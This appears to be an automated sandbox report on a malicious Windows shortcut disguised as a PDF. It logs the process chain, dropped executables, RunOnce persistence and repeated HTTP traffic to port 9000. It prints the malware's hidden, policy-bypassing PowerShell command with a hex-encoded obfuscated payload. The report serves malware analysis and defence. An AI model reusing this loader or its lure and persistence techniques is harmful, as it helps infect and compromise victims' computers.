Source: Agreement for Cooperation.PDF.lnk.download.lnk

LNK file: ..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: wntdll.pdbUGP source: updater.exe, 0000000B.00000003.2230085986.0000000004A94000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229933261.0000000004BB7000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235652956.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2358128445.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2349255697.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2348209254.0000000004E67000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433215959.00000000047D0000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2428081410.0000000004634000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427935882.0000000004757000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: updater.exe, 0000000B.00000003.2230085986.0000000004A94000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229933261.0000000004BB7000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235652956.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2358128445.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2349255697.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2348209254.0000000004E67000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433215959.00000000047D0000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2428081410.0000000004634000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427935882.0000000004757000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function xmCKI($tXxJW){return -split ($tXxJW -replace '..', '0x$& ')};$LWTKB = xmCKI('A91AEEF14D627B7FAFF488DBCCFE43EDD74C8EC41DF4AFDAE86A2CACD63D2618E776AB95B16BE51714D0C93388447C10995B802510DA96A4BF1B9A934093F8EA670FE6B480A54AB53BE4B52FC1ABDD0B2F9A47D5FD8EC0B5565CF6E0D5AAA18330404F1BAB02271E1F4ADB91DA26835FBD6F294448368AE11C958F79F412C62C2B5B5ED8BC591CE31107DB0B96407294783A633B181B6CCFC9827E4078D2D612AECF34E25C3732DA701D97A8D605EA1A7C739ADF164E68BD11E6ACEC79C72BEDBA160C18420A5DB1D9810BD0B1FE135F640F78FEC268A192784340B9C69305F19E92CF4F0EF596571F8839C8ACF651D0BA0EE2D7EC50E13BE537E55036BC27049B63D09CA27C81001319E386CF456F2175699371CAD7A1A9F6165C7C5452BCA976318223F68E182DDFA4A6A6E0D3A37B3FF3D396A65B4465C3CC0736702E834F0BAAAE20F6B4E273E97BD27BF14DAB30E834EC586FA7FEB119497E06F166F11571BD5761F27FC24FD517F4F7B7D12D7114EFC8DB1E29AA9687AC4BC2A6B4BDD893E35941DAC5F77F86582F2F16A448F88F4807CB645FDC4426FF6A2A211758433846D104900F052F81898303FB3E54B3F463B628B3140A4BBD84F9E5B31E891ED77433A9B65BD1C0FEA1C06740E0BC212BC132161654E200851A5DA2BB192042E792908EA1F9C6EB7EEE004E8E047C0A08E66E6D9B8E7BCB944609F5B020CC1479272B40A2D304AC191E6C492064720ABE984D0F4CF077C873C863D03924997C8E4E627C7811BF2EBD9B06DA61C1C0B04E7EA2F2CABB41143DA53E8F7300F859AE1CFDF9875E0DFEEBD0FF7229B35B1646F5B57816308AD9D62C6CA75D45BD15C1A2B4DA51922CAA8E46AC5B09DF7821207379A305101F22EA2F6BB40DBA589322A506D5AD46DA486CF86F662522D165F38590072F1ACCF13A612369B433B00E300CFD06068817A53C68187347C9AD251D6F1F333877BAD8577C4AB84BA78F81483CBCB6BDB1E8FE6A5233FDFFF6CC9928404B2E11CFC58E38822138C47F68D6A48778E95F28D8F25C5F1A20D5A198B64B2F05536C7EA824FF816BF184FEA692844BADF041A46DC4E6A197BDA3855B32C46F4B393D58D5D4C7BFBCF82BEB6990BB2069DA637871DBFB368F1C0E6C0F2A72676CCF3B7FA358C5E09F7E9A8F481775A2D9117CF07D2ED2895D11A6B79E3CE80BD9091E7CC6FCFC76786B1A9A48950C7262C0E9607A4C88C23F16B1CD72267A4445314586554ED8498E02E1556E66E550678D68D2A7DBDBC94565DFEE58566DCE466D06C87ACD0517E92543D88380A92238E86864E5F75C12798C8828272B20A02C40B6B317F309F4D0C660C1D640DEF366D59F6E605CA9CEA69B14214C5D03DF39FC5D74B79C43D775D114603D2C9BE7F3D35D5F2C62881528C7674E5F58B568C6356FC1470BD70B46364F0545EFF33FFC0F3A9487F46E68A23603BCF5A004A1E550EB57C6E96B9828CB4973DBFCB8D62AFD7390E01D13CC7760093F91B2F0C22D85E18D540E5CBFF1D1A2466BDD39B1846617923D9C4B65A96DF2E6FCA65713714D212F0F1E8A005B0154FBD7266BA5500E44B40DDFC0174EC740D8CE82EC79B28E9071C42D33693277F784C16744C61BAB31BEF511D797C50AFCE5B6F0157F4B0B8F8201DBCAFA5813F3156ECFB13519109FF3673AEFC6E65C7966D8AFA03A8D9D665BF954962CC128461D04E92BBC3E9ACD8CA2B7120BF07F55A8EE5E4B6F185E1266C8EDDD2EE3761605723CF877A93883B9F459F8231AF5FF827049DD16CBCFA02DE3ABB97DA37D487474F6D66EFAF3D7D75CF686BD09C2D72BBEA469800332FE98AA37BAAC82515B23041CB7D36849F05AC76ED6CF4E5DEEAB16E7FFA53E4B56F7ECC66091D6B1DFAF76D3C264E80E69B82674685BF8A742080384CA722B401E88F71676753C5F86D718994E638562E8B5A9B07
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function xmCKI($tXxJW){return -split ($tXxJW -replace '..', '0x$& ')};$LWTKB = xmCKI('A91AEEF14D627B7FAFF488DBCCFE43EDD74C8EC41DF4AFDAE86A2CACD63D2618E776AB95B16BE51714D0C93388447C10995B802510DA96A4BF1B9A934093F8EA670FE6B480A54AB53BE4B52FC1ABDD0B2F9A47D5FD8EC0B5565CF6E0D5AAA18330404F1BAB02271E1F4ADB91DA26835FBD6F294448368AE11C958F79F412C62C2B5B5ED8BC591CE31107DB0B96407294783A633B181B6CCFC9827E4078D2D612AECF34E25C3732DA701D97A8D605EA1A7C739ADF164E68BD11E6ACEC79C72BEDBA160C18420A5DB1D9810BD0B1FE135F640F78FEC268A192784340B9C69305F19E92CF4F0EF596571F8839C8ACF651D0BA0EE2D7EC50E13BE537E55036BC27049B63D09CA27C81001319E386CF456F2175699371CAD7A1A9F6165C7C5452BCA976318223F68E182DDFA4A6A6E0D3A37B3FF3D396A65B4465C3CC0736702E834F0BAAAE20F6B4E273E97BD27BF14DAB30E834EC586FA7FEB119497E06F166F11571BD5761F27FC24FD517F4F7B7D12D7114EFC8DB1E29AA9687AC4BC2A6B4BDD893E35941DAC5F77F86582F2F16A448F88F4807CB645FDC4426FF6A2A211758433846D104900F052F81898303FB3E54B3F463B628B3140A4BBD84F9E5B31E891ED77433A9B65BD1C0FEA1C06740E0BC212BC132161654E200851A5DA2BB192042E792908EA1F9C6EB7EEE004E8E047C0A08E66E6D9B8E7BCB944609F5B020CC1479272B40A2D304AC191E6C492064720ABE984D0F4CF077C873C863D03924997C8E4E627C7811BF2EBD9B06DA61C1C0B04E7EA2F2CABB41143DA53E8F7300F859AE1CFDF9875E0DFEEBD0FF7229B35B1646F5B57816308AD9D62C6CA75D45BD15C1A2B4DA51922CAA8E46AC5B09DF7821207379A305101F22EA2F6BB40DBA589322A506D5AD46DA486CF86F662522D165F38590072F1ACCF13A612369B433B00E300CFD06068817A53C68187347C9AD251D6F1F333877BAD8577C4AB84BA78F81483CBCB6BDB1E8FE6A5233FDFFF6CC9928404B2E11CFC58E38822138C47F68D6A48778E95F28D8F25C5F1A20D5A198B64B2F05536C7EA824FF816BF184FEA692844BADF041A46DC4E6A197BDA3855B32C46F4B393D58D5D4C7BFBCF82BEB6990BB2069DA637871DBFB368F1C0E6C0F2A72676CCF3B7FA358C5E09F7E9A8F481775A2D9117CF07D2ED2895D11A6B79E3CE80BD9091E7CC6FCFC76786B1A9A48950C7262C0E9607A4C88C23F16B1CD72267A4445314586554ED8498E02E1556E66E550678D68D2A7DBDBC94565DFEE58566DCE466D06C87ACD0517E92543D88380A92238E86864E5F75C12798C8828272B20A02C40B6B317F309F4D0C660C1D640DEF366D59F6E605CA9CEA69B14214C5D03DF39FC5D74B79C43D775D114603D2C9BE7F3D35D5F2C62881528C7674E5F58B568C6356FC1470BD70B46364F0545EFF33FFC0F3A9487F46E68A23603BCF5A004A1E550EB57C6E96B9828CB4973DBFCB8D62AFD7390E01D13CC7760093F91B2F0C22D85E18D540E5CBFF1D1A2466BDD39B1846617923D9C4B65A96DF2E6FCA65713714D212F0F1E8A005B0154FBD7266BA5500E44B40DDFC0174EC740D8CE82EC79B28E9071C42D33693277F784C16744C61BAB31BEF511D797C50AFCE5B6F0157F4B0B8F8201DBCAFA5813F3156ECFB13519109FF3673AEFC6E65C7966D8AFA03A8D9D665BF954962CC128461D04E92BBC3E9ACD8CA2B7120BF07F55A8EE5E4B6F185E1266C8EDDD2EE3761605723CF877A93883B9F459F8231AF5FF827049DD16CBCFA02DE3ABB97DA37D487474F6D66EFAF3D7D75CF686BD09C2D72BBEA469800332FE98AA37BAAC82515B23041CB7D36849F05AC76ED6CF4E5DEEAB16E7FFA53E4B56F7ECC66091D6B1DFAF76D3C264E80E69B82674685BF8A742080384CA722B401E88F71676753C5F86D718994E638562E8B5A9B07			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe

Code function: 11_2_004DC6D9 LoadLibraryA,GetProcAddress,

11_2_004DC6D9

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF848D82325 push eax; iretd	4_2_00007FF848D8233D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF8476F7888 push ebx; retf	7_2_00007FF8476F792A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF8476F820A push E960BFADh; ret	7_2_00007FF8476F8209
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF8476F81F8 push E960BFADh; ret	7_2_00007FF8476F8209
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF8476F7557 push ebx; iretd	7_2_00007FF8476F756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF8476F792B push ebx; retf	7_2_00007FF8476F792A
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_00488B75 push ecx; ret	11_2_00488B88
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_0047CBF1 push eax; retf	11_2_0047CBF8
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_0134712D push 01347159h; ret	11_2_01347151
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_0134712B push 01347159h; ret	11_2_01347151
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_0133D199 push 0133D20Fh; ret	11_2_0133D207
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_0133F011 push ecx; mov dword ptr [esp], ecx	11_2_0133F016
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_01337051 push 013370C0h; ret	11_2_013370B8
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_0133704F push 013370C0h; ret	11_2_013370B8
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_013470B5 push 013470E1h; ret	11_2_013470D9
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_013470ED push 01347119h; ret	11_2_01347111
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_013370D1 push 013370FDh; ret	11_2_013370F5
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_013370C9 push 013370FDh; ret	11_2_013370F5
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_0134133D push 01341369h; ret	11_2_01341361
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_0134133B push 01341369h; ret	11_2_01341361
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_0133D325 push 0133D351h; ret	11_2_0133D349
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_0134137D push 013413A9h; ret	11_2_013413A1
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_0134137B push 013413A9h; ret	11_2_013413A1
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_0133D389 push 0133D3D6h; ret	11_2_0133D3CE
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_0133D388 push 0133D3D6h; ret	11_2_0133D3CE
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_0133D211 push 0133D2B9h; ret	11_2_0133D2B1
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_01346275 push 013462A9h; ret	11_2_013462A1
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_0134627D push 013462A9h; ret	11_2_013462A1
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_0133D2BB push 0133D351h; ret	11_2_0133D349
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_013462CC push 01346310h; ret	11_2_01346308
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_013462CD push 01346310h; ret	11_2_01346308

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\mshta.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\mshta.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\47891652\updater.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	File created: C:\ahdccea\AutoIt3.exe			Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce bdbhbhc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce bdbhbhc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce bdbhbhc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce bdbhbhc	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.lnk

Static PE information: Agreement for Cooperation.PDF.lnk.download.lnk

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 50030 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 50052 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 50063 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 50064 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 50065 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 50066 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 50067 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50067
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 50075 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 50076 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 50078 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50079
Source: unknown	Network traffic detected: HTTP traffic on port 50081 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50081
Source: unknown	Network traffic detected: HTTP traffic on port 50082 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 50084 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 50084
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 9000
